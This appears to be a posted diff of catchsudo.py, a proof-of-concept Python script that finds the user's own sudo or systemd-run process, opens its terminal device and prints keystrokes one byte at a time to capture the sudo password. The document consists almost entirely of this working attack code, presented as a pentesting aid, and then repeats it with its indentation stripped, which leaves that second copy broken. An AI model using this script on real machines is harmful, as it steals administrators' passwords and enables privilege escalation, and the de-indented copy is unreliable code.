bahorn · May 4, 2024 20:12
diff --git a/catchsudo.py b/catchsudo.py
 """
 A POC for the user readable pty allowing you to capture your password,
 but with sudo. You might need to press enter once at the password prompt
 to get this to work, bit of a race condition there. Should be noted that
 a root owned tty only starts after a correct password, but you can still
 log keys after that with this (but it will break the terminal and will
 need to be killed).

 The only advantage to targeting systemd-run --pty is that you don't seem to
 need to kill -9 the targeted session afterwards so it behaves a bit better.

 I don't consider this a security issue, though this one I do get why it
 can be considered undesirable.
 Might be useful during pentesting when you already have access to an account
 that can manage the system but don't know the password to access sudo.
 But if you are dependent on a sysadmin logging in and using sudo/systemd-run
 you can already do 2000 other things.

 Tested on Ubuntu Desktop 22.04.
 """
 import os
 import psutil

 WANT_TO_HIJACK = ['sudo', 'systemd-run']


 def takeover(pty):
    f = open(pty, 'rb')

    while True:
        k = f.read(1)
        print(k)
        if k == b'\n':
            break

    f.close()


 def find_target():
    us = os.getlogin()

    for process in psutil.process_iter(['name', 'username', 'terminal']):
        if process.info['name'] not in WANT_TO_HIJACK:
            continue

        if process.info['username'] != us:
            continue

        return process.info['terminal']

    return None


 def main():
    while True:
        pty = find_target()
        if pty:
            print(f'found {pty}')
            takeover(pty)
            break


 if __name__ == "__main__":
    main()
	"""
	A POC for the user readable pty allowing you to capture your password,
	but with sudo. You might need to press enter once at the password prompt
	to get this to work, bit of a race condition there. Should be noted that
	a root owned tty only starts after a correct password, but you can still
	log keys after that with this (but it will break the terminal and will
	need to be killed).

	The only advantage to targeting systemd-run --pty is that you don't seem to
	need to kill -9 the targeted session afterwards so it behaves a bit better.

	I don't consider this a security issue, though this one I do get why it
	can be considered undesirable.
	Might be useful during pentesting when you already have access to an account
	that can manage the system but don't know the password to access sudo.
	But if you are dependent on a sysadmin logging in and using sudo/systemd-run
	you can already do 2000 other things.

	Tested on Ubuntu Desktop 22.04.
	"""
	import os
	import psutil

	WANT_TO_HIJACK = ['sudo', 'systemd-run']


	def takeover(pty):
	f = open(pty, 'rb')

	while True:
	k = f.read(1)
	print(k)
	if k == b'\n':
	break

	f.close()


	def find_target():
	us = os.getlogin()

	for process in psutil.process_iter(['name', 'username', 'terminal']):
	if process.info['name'] not in WANT_TO_HIJACK:
	continue

	if process.info['username'] != us:
	continue

	return process.info['terminal']

	return None


	def main():
	while True:
	pty = find_target()
	if pty:
	print(f'found {pty}')
	takeover(pty)
	break


	if __name__ == "__main__":
	main()